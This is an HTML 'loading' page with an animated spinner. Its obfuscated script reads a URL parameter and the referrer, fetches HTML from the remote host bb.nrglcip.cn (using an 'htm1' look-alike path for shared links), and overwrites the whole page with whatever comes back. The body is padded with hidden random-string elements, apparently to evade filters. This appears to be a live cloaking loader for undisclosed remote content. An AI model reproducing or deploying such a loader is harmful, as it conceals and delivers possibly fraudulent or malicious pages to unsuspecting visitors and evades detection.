<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .ChmfNFtaO {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .ChmfNFtaO .WS4U34R {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .ChmfNFtaO .content {
            line-height: 50px;
            text-align: center
        }

        .ChmfNFtaO .img {
            width: 100%
        }

        .ChmfNFtaO .i3sLIU {
            text-align: center
        }

        .ChmfNFtaO .i3sLIU span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .ChmfNFtaO .i3sLIU span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .ChmfNFtaO .i3sLIU span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .ChmfNFtaO .i3sLIU span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .ChmfNFtaO .i3sLIU span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .ChmfNFtaO .i3sLIU span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .ChmfNFtaO .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function mGrESCADh4ts(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var qPAdmU = mGrESCADh4ts('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ qPAdmU +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ qPAdmU +".html?a=share";
		}
		
        ojmbDWazZT=url+"#"+new Date().getTime();
        ojmbDWazZT && function() {
            $.get(ojmbDWazZT, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >EG4MS5YlchoAZnF1WFePNL0y5p8tUp9MTm208TdseByLW0wCuXnDcdrvMAMbevVcl5uD9kgSQlG90Gk0SrjzTukL824i8y</li>
<h1 style='display:none' >PaSZh1Yy4NF2bvN9U5T17n7ol6kGY7x5ZyGvNtbIbxvVa57V12XHtH1SIN4cEPWF52FNajVnBBM5BKq3OwkB4Hdlk7ydVuqsp</h1>
<b style='display:none' >VeSPCDDDeWcZf7VRzC4zRdAWm8a3IM7ESypUGPgkR07QN4HTOL1d</b><div class="ChmfNFtaO">
    <div class="WS4U34R">
        <div class="i3sLIU">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>hU69li10DZI1FJA3YzVF6C9WBDRHt5rH6ljyEC5xSDubAf8EHmeDYNK8RPaivXUX5df5NnQNUZifLDkyPAJm</div>
<h1 style='display:none' >lgY77xIl1G0geO</h1>
<img  src='' style='display:none'>
<ul style='display:none' >IDsB9xJaa8Wj0xFPfRTcZKdtLMFHq</ul>
<li style='display:none' >rxqfUl98vOPC3sY9ZHbUYxMh9NqS1mQVWd0bkl9i71woQ6Azc</li>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<b style='display:none' >a3Y5qq1qEPHKpPbXAHEt3hLpRNSaSfrEDgwu3DZiwCe5pfr2z0ZYui24Qkp1aMtceUrHT</b>
<div style='display:none'>hU69li10DZI1FJA3YzVF6C9WBDRHt5rH6ljyEC5xSDubAf8EHmeDYNK8RPaivXUX5df5NnQNUZifLDkyPAJm</div>
<li style='display:none' >rxqfUl98vOPC3sY9ZHbUYxMh9NqS1mQVWd0bkl9i71woQ6Azc</li></body>
</html>